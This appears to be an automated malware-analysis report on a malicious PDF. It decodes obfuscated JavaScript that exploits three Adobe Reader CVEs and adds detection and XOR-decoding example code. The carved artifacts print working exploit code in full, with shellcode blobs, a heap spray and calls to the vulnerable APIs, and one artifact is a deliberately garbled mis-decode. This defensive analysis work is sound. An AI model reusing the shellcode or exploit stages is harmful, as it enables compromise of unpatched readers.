Verdict: MALICIOUS
Risk score: 476

Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.007 JavaScript
This PDF carries obfuscated JavaScript that targets three known Adobe Reader vulnerabilities: CVE-2007-5659 (Collab.collectEmailInfo), CVE-2009-0927 (Collab.getIcon) and CVE-2009-4324 (media.newPlayer). The outer stage is a numeric array that a single-byte XOR turns back into JavaScript; the decoded stage defines one function per sink, each of which heap-sprays an embedded shellcode blob around the 0x0c0c0c0c address before calling the vulnerable API. ClamAV flags the shellcode only in the decoded stage (Js.Exploit.Shellcode-18), not in the raw /JS object, so file-level scanning of the PDF alone misses it. The shellcode is the payload the exploit runs; if it fetches a further stage, the URL or host lives inside the shellcode and was not reconstructed from the script excerpts.
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (9)
- media.newPlayer — CVE-2009-4324 (critical; CVE match: exact; rule CVE_2009_4324). PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (identified after JavaScript deobfuscation)
- Collab.getIcon — CVE-2009-0927 (critical; CVE match: exact; rule CVE_2009_0927). PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (identified after JavaScript deobfuscation)
- Collab.collectEmailInfo — CVE-2007-5659 (critical; CVE match: exact; rule CVE_2007_5659). PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
- Pidief-style multi-CVE JavaScript dispatcher (critical; CVE match: likely; rule PDF_PIDIEF_MULTI_CVE_DISPATCH). A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file. In this sample the third sink is media.newPlayer; no util.printf call appears in the recovered stage preview.
- Multi-CVE Adobe Reader JavaScript exploit kit (critical; rule PDF_ADOBE_READER_MULTI_CVE_JS_KIT). One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF is selecting old Reader vulnerabilities by viewer version and running heap-sprayed Acrobat JavaScript exploit paths.
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT). PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER). PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
- Embedded JS stream (low; rule PDF_JS). PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
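The rules above combine three signals: a call to one of the known Reader API sinks, heap-spray staging around it, and version gating. The following is an added example (not one of the report's own rules) that applies the same logic to a decoded Acrobat JavaScript stage. The sink regexes follow the API names the CVE rules key on; the staging patterns, thresholds, verdict labels and both sample scripts are this example's own constructions, and the util.printf entry (CVE-2008-2992) is included so the benign-format case can be shown.

```javascript
// Added example, not one of the report's own rules: static triage of a decoded
// Acrobat JavaScript stage. Sink regexes follow the API names the CVE rules above
// key on; the staging patterns, thresholds and verdict labels are this example's.

const SINKS = [
  { api: 'Collab.collectEmailInfo', cve: 'CVE-2007-5659', re: /Collab\s*\.\s*collectEmailInfo\s*\(/ },
  { api: 'Collab.getIcon',          cve: 'CVE-2009-0927', re: /Collab\s*\.\s*getIcon\s*\(/ },
  { api: 'media.newPlayer',         cve: 'CVE-2009-4324', re: /media\s*\.\s*newPlayer\s*\(/ },
  // util.printf is only a sink with an oversized field width; "%.2f" in a form is benign.
  { api: 'util.printf',             cve: 'CVE-2008-2992', re: /util\s*\.\s*printf\s*\(\s*["'][^"']*%\d{4,}/ },
];

const STAGING = [
  { name: 'unescape-%u-payload',        re: /unescape\s*\(\s*["']%u[0-9a-f]{4}/i },
  { name: 'spray-address-0c0c0c0c',     re: /%u0c0c%u0c0c|0x0c0c0c0c/i },
  { name: 'string-doubling-loop',       re: /while\s*\(\s*\w+\.length\s*<=?\s*[^)]+\)\s*\{?\s*\w+\s*\+=\s*\w+/ },
  { name: 'array-fill-block+shellcode', re: /\w+\s*\[\s*\w+\s*\]\s*=\s*\w+\s*\+\s*\w+\s*;/ },
  { name: 'viewer-version-gating',      re: /app\s*\.\s*viewerVersion/ },
];

// Sinks plus spray staging together are the high-confidence signal; either
// alone is weaker, and plain form JavaScript with neither stays "low".
function triageAcrobatJs(src) {
  const sinks = SINKS.filter(s => s.re.test(src)).map(s => ({ api: s.api, cve: s.cve }));
  const staging = STAGING.filter(s => s.re.test(src)).map(s => s.name);
  let verdict = 'low';
  if (sinks.length > 0 && staging.length >= 2) verdict = 'critical';
  else if (sinks.length > 0) verdict = 'high';
  else if (staging.length >= 2) verdict = 'medium';
  return { sinks, staging, verdict };
}

// Spray arithmetic as written in the decoded collab_email() stage:
// count2 = (cc - 0x400000) / addr and the loop runs while count < count2,
// so the fractional bound rounds the iteration count up.
function sprayIterations(targetAddr, blockBytes) {
  return Math.ceil((targetAddr - blockBytes) / blockBytes);
}

// Constructed sample in the shape of the decoded stage (shellcode cut to a
// stub, dispatcher line added to show version gating).
const SAMPLE_STAGE = `
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933");
var block = unescape("%u0c0c%u0c0c");
while(block.length <= 32768) block+=block;
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
try {this.media.newPlayer(null);} catch(e) {}
}
function collab_email(){var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){Collab.getIcon(unescape("%u0c0c%u0c0c"));}}
if(app.viewerVersion>=9){newplayer();}else{collab_email();}
`;

// Constructed benign form script: util.printf with an ordinary format string.
const SAMPLE_FORM = `
var total = this.getField("qty").value * this.getField("price").value;
event.value = util.printf("%.2f", total);
`;

console.log(JSON.stringify(triageAcrobatJs(SAMPLE_STAGE), null, 2));
console.log(JSON.stringify(triageAcrobatJs(SAMPLE_FORM)));
console.log('spray blocks:', sprayIterations(0x0c0c0c0c, 0x400000));
```

Run on the constructed stage the triage reports all three CVE sinks and five staging indicators (verdict critical); the form script reports none and stays low, which is the distinction the PDF_JAVASCRIPT and PDF_JS rules make. The spray helper reproduces the collab_email() arithmetic: 48 blocks of 4 MiB, i.e. 0x0C000000 bytes, which is why 0x0c0c0c0c is the chosen landing address.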
Extracted artifacts (3)
Files carved from inside the sample during analysis.

Filename: javascript_obj0039_000.js
SHA-256: ab8997041d178b8648e4b8bda1a44713314c6878d1d579f7515b9a316974148b
Kind: pdf-javascript-stream
Source: PDF /JS object 39 at offset 0x16F
Size: 28073 bytes

Detection
ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token)

Preview script (first 1,000 lines of the extracted script)
a1lZ0wpc="BU37na1T=[197,214,205,192,215,202,204,205,131,197,202,219,252,202,2";
a1lZ0wpc+= "15,139,218,194,209,208,211,143,207,198,205,138,216,212,20";
a1lZ0wpc+= "3,202,207,198,139,218,194,209,208,211,141,207,198,205,196";
a1lZ0wpc+= ",215,203,137,145,159,207,198,205,138,216,218,194,209,208,";
a1lZ0wpc+= "211,136,158,218,194,209,208,211,152,222,218,194,209,208,2";
a1lZ0wpc+= "11,158,218,194,209,208,211,141,208,214,193,208,215,209,20";
a1lZ0wpc+= "2,205,196,139,147,143,207,198,205,140,145,138,152,209,198";
a1lZ0wpc+= ",215,214,209,205,131,218,194,209,208,211,152,222,174,169,";
a1lZ0wpc+= "197,214,205,192,215,202,204,205,131,205,198,212,211,207,1";
a1lZ0wpc+= "94,218,198,209,139,138,216,174,169,213,194,209,131,208,20";
a1lZ0wpc+= "3,198,207,207,192,204,199,198,131,158,131,214,205,198,208";
a1lZ0wpc+= ",192,194,211,198,139,129,134,214,146,146,230,225,134,214,";
a1lZ0wpc+= "151,225,150,225,134,214,224,154,144,144,134,214,155,146,1";
a1lZ0wpc+= "49,149,134,214,226,229,224,154,134,214,155,147,147,146,13";
a1lZ0wpc+= "4,214,147,225,144,151,134,214,230,145,226,149,134,214,230";
a1lZ0wpc+= ",225,229,226,134,214,230,155,147,150,134,214,229,229,230,";
a1lZ0wpc+= "226,134,214,229,229,229,229,134,214,148,224,151,229,134,2";
a1lZ0wpc+= "14,226,149,226,149,134,214,229,154,226,149,134,214,147,14";
a1lZ0wpc+= "8,224,145,134,214,226,149,154,149,134,214,226,149,226,149";
a1lZ0wpc+= ",134,214,230,149,145,231,134,214,145,231,226,226,134,214,";
a1lZ0wpc+= "225,226,231,149,134,214,145,231,147,225,134,214,226,230,2";
a1lZ0wpc+= "24,230,134,214,231,149,145,231,134,214,145,231,155,149,13";
a1lZ0wpc+= "4,214,145,149,226,149,134,214,224,231,154,155,134,214,150";
a1lZ0wpc+= ",150,231,144,134,214,230,147,230,147,134,214,154,155,145,";
a1lZ0wpc+= "149,134,214,231,144,224,144,134,214,230,147,151,226,134,2";
a1lZ0wpc+= "14,145,149,230,147,134,214,231,151,154,155,134,214,150,14";
a1lZ0wpc+= "6,231,144,134,214,230,147,230,147,134,214,154,155,145,149";
a1lZ0wpc+= ",134,214,231,144,224,155,134,214,145,231,150,149,134,214,";
a1lZ0wpc+= "224,224,150,146,134,214,229,229,226,150,134,214,229,231,1";
a1lZ0wpc+= "51,230,134,214,226,149,226,149,134,214,151,151,226,149,13";
a1lZ0wpc+= "4,214,224,230,150,229,134,214,224,155,224,154,134,214,226";
a1lZ0wpc+= ",149,226,149,134,214,231,144,224,230,134,214,224,226,231,";
a1lZ0wpc+= "151,134,214,229,145,224,225,134,214,225,147,150,154,134,2";
a1lZ0wpc+= "14,151,230,145,231,134,214,230,144,151,230,134,214,226,14";
a1lZ0wpc+= "9,226,149,134,214,224,230,226,149,134,214,154,150,224,226";
a1lZ0wpc+= ",134,214,226,149,154,151,134,214,231,150,224,230,134,214,";
a1lZ0wpc+= "224,144,224,230,134,214,229,145,224,226,134,214,225,147,1";
a1lZ0wpc+= "50,154,134,214,151,230,145,231,134,214,154,148,151,230,13";
a1lZ0wpc+= "4,214,226,149,226,149,134,214,145,150,226,149,134,214,230";
a1lZ0wpc+= ",149,151,226,134,214,148,226,145,231,134,214,224,224,229,";
a1lZ0wpc+= "150,134,214,150,154,230,149,134,214,226,145,229,147,134,2";
a1lZ0wpc+= "14,226,145,149,146,134,214,224,148,226,150,134,214,224,14";
a1lZ0wpc+= "4,155,155,134,214,224,147,231,230,134,214,230,145,149,146";
a1lZ0wpc+= ",134,214,226,145,226,150,134,214,226,149,224,144,134,214,";
a1lZ0wpc+= "149,149,154,150,134,214,229,149,229,149,134,214,229,146,2";
a1lZ0wpc+= "29,150,134,214,150,154,229,149,134,214,226,226,229,147,13";
a1lZ0wpc+= "4,214,148,226,145,231,134,214,229,149,229,149,134,214,229";
a1lZ0wpc+= ",150,229,149,134,214,229,149,229,149,134,214,229,147,150,";
a1lZ0wpc+= "154,134,214,150,154,225,149,134,214,226,230,229,147,134,2";
a1lZ0wpc+= "14,229,147,229,148,134,214,231,144,145,231,134,214,145,23";
a1lZ0wpc+= "1,154,226,134,214,155,155,231,145,134,214,226,150,231,230";
a1lZ0wpc+= ",134,214,229,147,150,144,134,214,231,147,145,231,134,214,";
a1lZ0wpc+= "226,150,155,149,134,214,154,150,150,144,134,214,230,229,1";
a1lZ0wpc+= "49,229,134,214,147,225,230,148,134,214,149,144,226,150,13";
a1lZ0wpc+= "4,214,148,231,154,150,134,214,146,155,226,154,134,214,154";
a1lZ0wpc+= ",224,225,149,134,214,231,145,148,147,134,214,149,148,226,";
a1lZ0wpc+= "230,134,214,226,225,149,231,134,214,148,224,
... (truncated)
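The stage above is the "numeric array XOR decoded" input that produced legacy_pdfkit_stage_000.js. As an added example (not part of the report or the analyzer), the following recovers the key the way an analyst would by hand: rebuild the string from its += fragments, pull out the number list, try all 256 single-byte keys, and rank candidates by printable density plus known-plaintext tokens. The snippet is constructed from the first fragments shown above, cut after 48 values with a closing bracket added; the token list and weights are this example's choices.

```javascript
// Added example, not part of the report: recover the single-byte XOR key of a
// numeric-array JavaScript stage and decode it. The snippet is constructed from
// the first fragments of javascript_obj0039_000.js above, cut after 48 values
// with a closing bracket added; the scoring tokens and weights are this
// example's choices.
const OBFUSCATED_SNIPPET =
  'a1lZ0wpc="BU37na1T=[197,214,205,192,215,202,204,205,131,197,202,219,252,202,2"; ' +
  'a1lZ0wpc+= "15,139,218,194,209,208,211,143,207,198,205,138,216,212,20"; ' +
  'a1lZ0wpc+= "3,202,207,198,139,218,194,209,208,211,141,207,198,205,196"; ' +
  'a1lZ0wpc+= ",215,203,137,145,159]";';

// Re-join the x="..."; x+="..." fragments in source order. The split is not
// token-aligned, so a number may straddle two fragments ("2" + "15").
function joinStringFragments(src) {
  const out = [];
  const re = /"((?:[^"\\]|\\.)*)"/g;
  let m;
  while ((m = re.exec(src)) !== null) out.push(m[1]);
  return out.join('');
}

// Pull the first [n,n,n,...] list out of the rebuilt text.
function extractNumericArray(text) {
  const m = text.match(/\[\s*(\d+(?:\s*,\s*\d+)*)/);
  if (!m) throw new Error('no numeric array found');
  return m[1].split(',').map(s => Number(s.trim()));
}

function xorDecode(bytes, key) {
  return bytes.map(b => String.fromCharCode((b ^ key) & 0xff)).join('');
}

// Known plaintext any Acrobat exploit stage must contain; a token hit outweighs
// the whole printable-density term so near-miss keys cannot tie.
const TOKENS = [/function/, /unescape/, /\bvar\b/, /util\./, /Collab\./, /media\./, /app\./];
function scorePlaintext(text) {
  if (text.length === 0) return 0;
  let printable = 0;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    if ((c >= 0x20 && c <= 0x7e) || c === 0x09 || c === 0x0a || c === 0x0d) printable++;
  }
  return printable / text.length + TOKENS.filter(re => re.test(text)).length;
}

// Brute-force all 256 keys and keep the best-scoring one.
function recoverXorKey(bytes) {
  let best = { key: 0, score: -1 };
  for (let key = 0; key < 256; key++) {
    const score = scorePlaintext(xorDecode(bytes, key));
    if (score > best.score) best = { key, score };
  }
  return best.key;
}

function decodeStage(src) {
  const bytes = extractNumericArray(joinStringFragments(src));
  const key = recoverXorKey(bytes);
  return { key, plaintext: xorDecode(bytes, key) };
}

const decoded = decodeStage(OBFUSCATED_SNIPPET);
console.log('key 0x' + decoded.key.toString(16) + ':', JSON.stringify(decoded.plaintext));
// A key off by the 0x20 bit flips letter case and turns punctuation into
// control characters, which is how the second decode in this report
// (legacy_pdfkit_stage_001.js) reads.
const stageBytes = extractNumericArray(joinStringFragments(OBFUSCATED_SNIPPET));
const nearMiss = decoded.key ^ 0x20;
console.log('key 0x' + nearMiss.toString(16) + ':', JSON.stringify(xorDecode(stageBytes, nearMiss)));
```

On the 48 values above the recovered key is 0xA3 and the plaintext is the opening of the decoded stage shown below, `function fix_it(yarsp,len){while(yarsp.length*2<`. The near-miss key 0x83 yields `FUNCTION` followed by control characters where the space and parentheses were, which is exactly the shape of the third artifact's preview.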
Filename: legacy_pdfkit_stage_000.js
SHA-256: c47fc4af534c1f810d5859959156c7574d29ffe270793433fe4702682619d044
Kind: deobfuscated-js
Source: numeric array XOR decoded JavaScript at offset 0x16F
Size: 5488 bytes

Detection
ClamAV: Js.Exploit.Shellcode-18
Obfuscation or payload: likely (carved artifact contains 9 eval/decoder/string-building tokens)

Preview script (first 1,000 lines of the extracted script)
function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}
function newplayer(){
var shellcode = unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uD1D1%uC588%uCFCA%uCDC5%uC3D4%uD4C1%uD2C3%uC988%uC1D4%uDE89%u949F%u89D5%uC5D3%u9497%uDED0%u9296%uD089%uCBC7%u93CF%u90D0%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC8F9%uD1C3%uCAF6%uDFC7%uD4C3%uC080%u9BCE%u00A6");
var block = unescape("%u0c0c%u0c0c");
var GDagaCuyNfRSFzaSZLO = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u514e%u4865%u4844%u724f%u4a6e%u6d43%u4b51%u4b79%u7156%u4d41%u5944%u596b%u7979%u625a%u626f%u7a6e%u634e%u4a4d%u6341%u6253%u4154%u5670%u5543%u4273%u4c51%u576d%u5772%u5670");
while(block.length <= 32768) block+=block;
block=block.substring(0,32768 - shellcode.length);
memory=new Array();for(i=0;i<0x2000;i++) {memory[i]= block + shellcode;}
util.printd("rlpPpjTXXIncUhwagCzcuHfmkzObBSZDGNdC", new Date());
util.printd("SotSxNQvMqKNjJkIXioKlmfZYfmiPGgGNNKn", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(GDagaCuyNfRSFzaSZLO, new Date());}
function collab_email(){var shellcode=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF053%uD02D%uA586%u9553%uEF6F%u0BE7%u63A5%u7D95%u18A9%u9CB6%uD270%u67AE%uAB6D%u7CA5%u4DE6%u9D57%uD3B9%uF841%uF82D%uA582%uC07B%uAA2D%u2DED%uBAF8%u7BA5%uA22D%uA52D%u0D63%uFFF8%u4E65%u5987%u5959%uE828%u4AA8%u6C95%uFD2C%u7ED8%uD544%uBC90%uD689%u1DF8%uBD47%uD2CE%uD6D2%u899C%uD189%uD1D1%uC588%uCFCA%uCDC5%uC3D4%uD4C1%uD2C3%uC988%uC1D4%uDE89%u949F%u89D5%uC5D3%u9497%uDED0%u9296%uD089%uCBC7%u93CF%u90D0%uD688%uD6CE%uD599%uCAD6%uD69B%uC0C2%uC3F9%uC7CB%uCACF%uC080%u9BCE%u00A6");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}
var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}
this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}
function collab_geticon(){if(app.doc.Collab.getIcon){var arry=new Array();var vvpethya=unescape("%u11EB%u4B5B%uC933%u8166%uAFC9%u8001%u0B34%uE2A6%uEBFA%uE805%uFFEA%uFFFF%u7C4F%uA6A6%uF9A6%u07C2%uA696%uA6A6%uE62D%u2DAA%uBAD6%u2D0B%uAECE%uD62D%u2D86%u26A6%uCD98%u55D3%uE0E0%u9826%uD3C3%uE04A%u26E0%uD498%u51D3%uE0E0%u9826%uD3C8%u2D56%uCC51%uFFA5%uFD4E%uA6A6%u44A6%uCE5F%uC8C9%uA6A6%uD3CE%uCAD4%uF2CB%uB059%u4E2D%uE34E%uA6A6%uCEA6%u95CA%uA694%uD5CE%uC3CE%uF2CA%uB059%u4E2D%u974E%uA6A6%u25A6%uE64A%u7A2D%uCCF5%u59E6%uA2F0%uA261%uC7A5%uC388%uC0DE%uE261%uA2A5%uA6C3%u6695%uF6F6%uF1F5%u59F6%uAAF0%u7A2D%uF6F6%uF5F6%uF6F6%uF059%u59B6%uAEF0%uF0F7%uD32D%u2D9A%u88D2%uA5DE%uF0
... (truncated)
Filename: legacy_pdfkit_stage_001.js
SHA-256: e668da4d85d7d4c6f6492f752208c571bbdc9808b421aca96216bce70bbf7a89
Kind: deobfuscated-js
Source: numPages XOR decoded JavaScript at offset 0x16F
Size: 5488 bytes

Preview script (first 1,000 lines of the extracted script)
This is the same 5488-byte stage as legacy_pdfkit_stage_000.js decoded under a different key guess. It reads as a letter-case-inverted copy of stage_000 in which punctuation became control or substitute characters ("[" and "]" for the braces, "-*" for each CR/LF pair, digits and parentheses dropped), i.e. the key used here differs from the correct one in the single 0x20 bit. It adds no content beyond stage_000; use stage_000 for analysis.
FUNCTION FIX IT YARSP LEN [WHILE YARSP LENGTH
LEN [YARSP YARSP ]YARSP YARSP SUBSTRING LEN RETURN YARSP ]-*FUNCTION NEWPLAYER [-*VAR SHELLCODE UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Ud Ud d Uc Ucfca Ucdc Uc d Ud c Ud c Uc Uc d Ude U f U d Uc d U Uded U Ud Ucbc U cf U d Ud Ud ce Ud Ucad Ud b Uc c Uc f Ud c Ucaf Udfc Ud c Uc U bce U a -*VAR BLOCK UNESCAPE U C C U C C -*VAR gdAGAcUYnFrsfZAszlo UNESCAPE U C C U C C U C C U C C U C C U C C U C C U C C U E U U U F U A E U D U B U B U U D U U B U U A U F U A E U E U A D U U U U U U U C U D U U -*WHILE BLOCK LENGTH BLOCK BLOCK -*BLOCK BLOCK SUBSTRING
SHELLCODE LENGTH -*MEMORY NEW aRRAY FOR I I X I [MEMORY{I} BLOCK SHELLCODE ]-*UTIL PRINTD RLPpPJtxxiNCuHWAGcZCUhFMKZoBbszdgnDc NEW dATE -*UTIL PRINTD sOTsXnqVmQknJjKixIOkLMFzyFMIpgGgnnkN NEW dATE -*TRY [THIS MEDIA NEWpLAYER NULL ] CATCH E []-*UTIL PRINTD gdAGAcUYnFrsfZAszlo NEW dATE ]-*-*FUNCTION COLLAB EMAIL [VAR SHELLCODE UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf Ud d Ua U Uef f U be U a U d U a U cb Ud U ae Uab d U ca U de U d Ud b Uf Uf d Ua Uc b Uaa d U ded Ubaf U ba Ua d Ua d U d Ufff U e U U Ue U aa U c Ufd c U ed Ud Ubc Ud U df Ubd Ud ce Ud d U c Ud Ud d Uc Ucfca Ucdc Uc d Ud c Ud c Uc Uc d Ude U f U d Uc d U Uded U Ud Ucbc U cf U d Ud Ud ce Ud Ucad Ud b Uc c Uc f Uc cb Ucacf Uc U bce U a VAR MEM ARRAY NEW aRRAY VAR CC X C C C C VAR ADDR X VAR SC LEN SHELLCODE LENGTH
VAR LEN ADDR
SC LEN X VAR YARSP UNESCAPE U U YARSP FIX IT YARSP LEN VAR COUNT CC
X ADDR FOR VAR COUNT COUNT COUNT COUNT [MEM ARRAY{COUNT} YARSP SHELLCODE ]-*VAR OVERFLOW UNESCAPE U C C U C C WHILE OVERFLOW LENGTH [OVERFLOW OVERFLOW ]-*THIS COLLABsTORE cOLLAB COLLECTeMAILiNFO [SUBJ MSG OVERFLOW] ]-*-*FUNCTION COLLAB GETICON [IF APP DOC cOLLAB GETiCON [VAR ARRY NEW aRRAY VAR VVPETHYA UNESCAPE U eb U b b Uc U Uafc U U b Ue a Uebfa Ue Uffea Uffff U c f Ua a Uf a U c Ua Ua a Ue d U daa Ubad U d b Uaece Ud d U d U a Ucd U d Ue e U Ud c Ue a U e Ud U d Ue e U Ud c U d Ucc Uffa Ufd e Ua a U a Uce f Uc c Ua a Ud ce Ucad Uf cb Ub U e d Ue e Ua a Ucea U ca Ua Ud ce Uc ce Uf ca Ub U e d U e Ua a U a Ue a U a d Uccf U e Ua f Ua Uc a Uc Uc de Ue Ua a Ua c U Uf f Uf f U f Uaaf U a d Uf f Uf f Uf f Uf U b Uaef Uf f Ud d U d a U d Ua de Uf
... (truncated)